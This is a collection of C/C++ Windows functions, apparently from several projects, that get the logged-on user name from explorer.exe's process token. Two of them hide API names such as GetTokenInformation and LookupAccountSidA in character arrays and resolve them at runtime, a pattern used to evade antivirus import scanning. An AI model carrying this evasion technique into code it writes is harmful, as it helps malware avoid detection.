static BOOL is_process_limited(void) { HANDLE token; if (!pOpenProcessToken || !pGetTokenInformation) return FALSE; if (pOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token)) { BOOL ret; TOKEN_ELEVATION_TYPE type = TokenElevationTypeDefault; DWORD size; ret = pGetTokenInformation(token, TokenElevationType, &type, sizeof(type), &size); CloseHandle(token); return (ret && type == TokenElevationTypeLimited); } return FALSE; }
char *GetLogUser2K() { typedef BOOL (WINAPI *OpenProcessTokenT)( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken"); typedef BOOL (WINAPI *LookupAccountSidAT)( __in_opt LPCSTR lpSystemName, __in PSID Sid, __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name, __inout LPDWORD cchName, __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName, __out PSID_NAME_USE peUse ); LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA"); typedef BOOL (WINAPI *GetTokenInformationT)( __in HANDLE TokenHandle, __in TOKEN_INFORMATION_CLASS TokenInformationClass, __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation, __in DWORD TokenInformationLength, __out_opt PDWORD ReturnLength ); GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation"); typedef HANDLE (WINAPI *OpenProcessT)( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess"); DWORD dwProcessID = GetProcessID("explorer.exe"); if (dwProcessID == 0) return NULL; BOOL fResult = FALSE; HANDLE hProc = NULL; HANDLE hToken = NULL; TOKEN_USER *pTokenUser = NULL; char *lpUserName = NULL; __try { // Open the process with PROCESS_QUERY_INFORMATION access hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID); if (hProc == NULL) { __leave; } fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken); if(!fResult) { __leave; } DWORD dwNeedLen = 0; fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen); if (dwNeedLen > 0) { pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen]; fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen); if (!fResult) { __leave; } } else { __leave; } SID_NAME_USE sn; TCHAR szDomainName[MAX_PATH]; DWORD dwDmLen = MAX_PATH; DWORD nNameLen = 256; lpUserName = new char[256]; fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn); } __finally { if (hProc) ::CloseHandle(hProc); if (hToken) ::CloseHandle(hToken); if (pTokenUser) delete[] (char*)pTokenUser; return lpUserName; } }
BOOL CSysInfo::getUserNameFromExplorerProcess(CString &csUserName) { TCHAR szUserName[255]; DWORD dwName = 255; PROCESSENTRY32 pe; pe.dwSize = sizeof( PROCESSENTRY32 ); HANDLE hToken; TOKEN_INFORMATION_CLASS TokenInformationClass = TokenUser; TCHAR szTokenInformation[255]; DWORD dwTokenInformationLength = 255;//sizeof( TOKEN_OWNER ); DWORD dwReturnLength=0; DWORD dwReferencedDomainName = 255; TCHAR szReferencedDomainName[255]; SID_NAME_USE peUse; HANDLE hExplorer = NULL; HANDLE hSnapshot = NULL; HMODULE hAdv = NULL; BOOL bExplorerFound = FALSE; HANDLE (WINAPI* pCreateToolhelp32Snapshot) (DWORD, DWORD) = NULL; BOOL (WINAPI* pProcess32First) (HANDLE, LPPROCESSENTRY32) = NULL; BOOL (WINAPI* pProcess32Next) (HANDLE, LPPROCESSENTRY32) = NULL; HANDLE (WINAPI* pOpenProcess) (DWORD, BOOL, DWORD) = NULL; BOOL (WINAPI* pOpenProcessToken) (HANDLE, DWORD, PHANDLE) = NULL; BOOL (WINAPI* pLookupAccountSid) (LPCTSTR, PSID, LPTSTR, LPDWORD, LPTSTR, LPDWORD, PSID_NAME_USE ) = NULL; BOOL (WINAPI* pGetTokenInformation) (HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD) = NULL; AddLog( _T( "getUserNameFromExplorerProcess: Trying to find logged on User ID from <explorer.exe> process...\n")); // First, try to use Advapi.dll if( !(hAdv = LoadLibrary( _T( "Advapi32.dll")))) { AddLog( _T( "\tFailed to load AdvApi32 library !\n")); return FALSE; } if( !( (*(FARPROC*)&pOpenProcessToken = GetProcAddress( hAdv , "OpenProcessToken" ) ) )|| !( (*(FARPROC*)&pOpenProcess = GetProcAddress( GetModuleHandle( _T( "KERNEL32.DLL")), "OpenProcess") ) )|| !( (*(FARPROC*)&pGetTokenInformation = GetProcAddress( hAdv , "GetTokenInformation") ) )|| #ifdef _UNICODE !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidW") ) ) ) #else !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidA") ) ) ) #endif { AddLog( _T( "\tFailed to load AdvApi32 library with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Try to use kernel32 to enum process if( !(*(FARPROC*)&pCreateToolhelp32Snapshot = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "CreateToolhelp32Snapshot") ) || #ifdef _UNICODE !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32FirstW") ) || !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32NextW") ) ) #else !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32First") ) || !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32Next") ) ) #endif { AddLog( _T( "\tFailed to load Kernel32 process access functions with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Create snapshot of running processes if( (hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPALL ,0 )) == INVALID_HANDLE_VALUE ) { AddLog( _T( "\tCreateToolhelp32Snapshot failed with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Trying to find explorer.exe into snapshot if( !pProcess32First( hSnapshot, &pe) ) { AddLog( _T( "\tProcess32First failed with error <%i> !\n"), GetLastError()); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } do { if( !CString(pe.szExeFile).CompareNoCase( _T( "explorer.exe"))) { bExplorerFound = TRUE; break; } pe.dwSize = sizeof( PROCESSENTRY32 ); } while (pProcess32Next( hSnapshot, &pe )); if (!bExplorerFound) { AddLog( _T( "\tCould not find <explorer.exe> process !\n")); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Retrieve a handle on explorer.exe process using ID */ if( !(hExplorer = pOpenProcess( PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID ))) { AddLog( _T( "\tFailed to open <explorer.exe> process with error <%i> !\n"), GetLastError()); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Open token associated to explorer.exe to get information if( !pOpenProcessToken( hExplorer, TOKEN_READ, &hToken ) ) { AddLog( _T( "\tOpenProcessToken failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } if( !pGetTokenInformation( hToken, TokenInformationClass, &szTokenInformation, dwTokenInformationLength, &dwReturnLength)) { AddLog( _T( "\tGetTokenInformation failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Lokkup user account running explorer.exe process if( !pLookupAccountSid( NULL, ((TOKEN_USER*)&szTokenInformation)->User.Sid, szUserName, &dwName, szReferencedDomainName, &dwReferencedDomainName, &peUse ) ) { AddLog( _T( "\tLookupAccountSid failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv ); // Ensure username exists if( CString(szUserName) == _T( "") ) { AddLog( _T( "\tFound empty user, so assuming failed !\n")); return FALSE; } AddLog( _T( "\t\t<User: %s>\n\tOK\n"), szUserName); csUserName = szUserName; return TRUE; }
//=================获得当前登陆用户名及计算机名称==================== BOOL GetCurrentUserName(char szUser[],char szDomain[]) { HANDLE hToken; //得到shell的token if(!GetTokenByName(hToken,"EXPLORER.EXE")) { return FALSE; } DWORD cbti = 0; PTOKEN_USER ptiUser = NULL; SID_NAME_USE snu; //取得所需空间大小 char JwFNw01[] = {'G','e','t','T','o','k','e','n','I','n','f','o','r','m','a','t','i','o','n','\0'}; GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw01); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); if (pGetTokenInformation(hToken, TokenUser, NULL, 0, &cbti)) { pCloseHandle(hToken); return FALSE; } //分配空间 char JwFNw02[] = {'G','e','t','P','r','o','c','e','s','s','H','e','a','p','\0'}; GetProcessHeapT pGetProcessHeap=(GetProcessHeapT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw02); char JwFNw03[] = {'H','e','a','p','A','l','l','o','c','\0'}; HeapAllocT pHeapAlloc=(HeapAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw03); ptiUser = (PTOKEN_USER) pHeapAlloc(pGetProcessHeap(), 0, cbti); if(!ptiUser) { pCloseHandle(hToken); return FALSE; } //取得token信息 char JwFNw05[] = {'H','e','a','p','F','r','e','e','\0'}; HeapFreeT pHeapFree=(HeapFreeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw05); if (!pGetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti)) { pCloseHandle(hToken); pHeapFree(pGetProcessHeap(), 0, ptiUser); return FALSE; } DWORD nUser = 50; DWORD nDomain = 50; //根据用户的sid得到用户名和domain char JwFNw06[] = {'L','o','o','k','u','p','A','c','c','o','u','n','t','S','i','d','A','\0'}; LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw06); if (!pLookupAccountSidA(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu)) { pCloseHandle(hToken); pHeapFree(pGetProcessHeap(), 0, ptiUser); return FALSE; } pCloseHandle(hToken); pHeapFree(pGetProcessHeap(), 0, ptiUser); return TRUE; }